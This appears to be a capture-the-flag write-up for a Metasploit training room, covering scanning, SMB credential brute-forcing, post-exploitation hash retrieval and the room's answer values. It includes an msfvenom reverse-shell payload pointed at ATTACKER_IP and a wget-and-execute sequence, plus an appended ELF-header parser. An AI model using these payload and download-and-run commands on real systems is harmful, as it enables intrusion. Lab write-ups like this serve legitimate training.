TryHackMe — Metasploit: Exploitation Writeup
This TryHackMe room focuses on practical exploitation techniques using the Metasploit Framework, including scanning, vulnerability assessment, exploitation, post-exploitation, and payload generation with Msfvenom.
Warning: For educational purposes only.
Task 1 — Introduction
To begin using Metasploit, start the framework with:
msfconsole
The Metasploit console provides access to scanners, exploits, payloads, post-exploitation modules, and auxiliary tools.
Task 2 — Scanning
Metasploit includes several modules capable of performing network and service discovery.
Port Scanning
You can search for available port scanning modules using:
search portscan
Important Parameters
- CONCURRENCY — Number of simultaneous targets;
- PORTS — Port range to scan;
- RHOSTS — Target IP or network;
- THREADS — Number of parallel threads.
Questions & Answers
Q: How many ports are open on the target system?
A: 5
nmap -sS YOUR_MACHINE_IP
Q: What NetBIOS name was discovered?
A: ACME IT SUPPORT
use scanner/discovery/udp_sweep
set RHOSTS YOUR_MACHINE_IP
run
Q: What service is running on port 8000?
A: webfs/1.21
use scanner/http/http_version
set RHOSTS YOUR_MACHINE_IP
set RPORT 8000
run
Q: What is the SMB password for user "penny"?
A: leo1234
use scanner/smb/smb_login
set RHOSTS YOUR_MACHINE_IP
set SMBUser penny
set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
run
Task 3 — The Metasploit Database
The Metasploit database helps organize discovered hosts, services, credentials, vulnerabilities, and sessions during engagements.
Common Services to Investigate
- HTTP — Web application vulnerabilities;
- FTP — Anonymous access or file exposure;
- SMB — SMB exploits such as MS17-010;
- SSH — Weak credentials;
- RDP — BlueKeep and remote access attacks.
Task 4 — Vulnerability Scanning
Metasploit provides auxiliary modules capable of testing services for known weaknesses and misconfigurations.
SMTP Open Relay Scanner
use scanner/smtp/smtp_relay
info
Questions & Answers
Q: Who wrote the SMTP relay scanning module?
A: Campbell Murray
Task 5 — Exploitation
After identifying vulnerabilities, Metasploit can launch exploits and establish interactive sessions on compromised systems.
Flag Retrieval
Q: What is the content of the flag.txt file?
A: THM-5455554845
cd C:\Users\Jon\Documents
dir
type flag.txt
Post-Exploitation
Metasploit allows shell upgrades and credential extraction using Meterpreter and post-exploitation modules.
Q: What is the NTLM hash of user "pirate"?
A: 8ce9a3ebd1647fcc5e04025019f4b875
background
sessions
use post/multi/manage/shell_to_meterpreter
run
sessions -i 2
getuid
Task 6 — Msfvenom
Msfvenom is used to generate custom payloads for multiple operating systems and architectures.
Supported Formats
- EXE;
- DLL;
- ELF;
- PHP;
- ASP;
- Python;
- Bash.
Generating an ELF Payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf > shell.elf
Hosting the Payload
python3 -m http.server 9000
Downloading on the Target
wget http://ATTACKER_IP:9000/shell.elf
chmod +x shell.elf
./shell.elf
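A small triage check for the file the msfvenom step produces, added here as an example and not part of the room or of the Metasploit project: it parses the ELF header and confirms the image is a 64-bit x86-64 executable, which is what a linux/x64 payload built with -f elf must be to run on the target (the same check applies to any unknown ELF found on a host). The header bytes below are constructed for offline use, not taken from a real shell.elf.

```python
import struct

# Constructed 64-byte ELF64 header (little-endian, x86-64) used as offline
# sample input; it is NOT the output of the msfvenom command above.
SAMPLE_ELF64_HEADER = (
    b"\x7fELF"                   # magic
    + bytes([2, 1, 1, 0])        # EI_CLASS=ELF64, EI_DATA=LSB, EI_VERSION=1, EI_OSABI=SysV
    + bytes(8)                   # EI_ABIVERSION + padding
    # e_type=ET_EXEC, e_machine=EM_X86_64, e_version, e_entry, e_phoff, e_shoff,
    # e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    + struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0x400078, 64, 0, 0, 64, 56, 1, 64, 0, 0)
)

ELF_CLASS = {1: "ELF32", 2: "ELF64"}
ELF_DATA = {1: "little-endian", 2: "big-endian"}
ELF_TYPE = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
ELF_MACHINE = {0x03: "x86", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}

def parse_elf_header(data: bytes) -> dict:
    """Decode the ELF identification bytes and the fixed header fields that
    precede the program-header table; raise ValueError on malformed input."""
    if len(data) < 16 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in ELF_CLASS or ei_data not in ELF_DATA:
        raise ValueError("invalid EI_CLASS or EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags:
    # the address-sized fields are 8 bytes in ELF64 and 4 bytes in ELF32.
    fmt = endian + ("HHIQQQI" if ei_class == 2 else "HHIIIII")
    if len(data) < 16 + struct.calcsize(fmt):
        raise ValueError("truncated ELF header")
    e_type, e_machine, _, e_entry, _, _, _ = struct.unpack_from(fmt, data, 16)
    return {
        "class": ELF_CLASS[ei_class],
        "endianness": ELF_DATA[ei_data],
        "type": ELF_TYPE.get(e_type, f"unknown({e_type})"),
        "machine": ELF_MACHINE.get(e_machine, f"unknown({e_machine:#x})"),
        "entry": e_entry,
    }

def is_linux_x64_image(data: bytes) -> bool:
    """True when the image is a 64-bit x86-64 ELF, i.e. what a linux/x64
    payload written with -f elf must be in order to execute on the target."""
    try:
        hdr = parse_elf_header(data)
    except ValueError:
        return False
    return hdr["class"] == "ELF64" and hdr["machine"] == "x86-64"
```

Running parse_elf_header over the bytes of shell.elf (open(path, "rb").read(64)) gives the same fields the file utility reports, so a mismatch against the chosen payload architecture is caught before the transfer step.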
Questions & Answers
Q: What is the other user's password hash?
A: $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
Final Thoughts
This TryHackMe room demonstrates how powerful Metasploit can be during penetration testing engagements, from reconnaissance to post-exploitation.
Understanding Metasploit exploitation techniques is essential for:
- Ethical Hacking;
- Penetration Testing;
- Red Team Operations;
- Exploit Development;
- Vulnerability Assessment;
- Cybersecurity Research.
I hope this article helped you understand practical exploitation using Metasploit.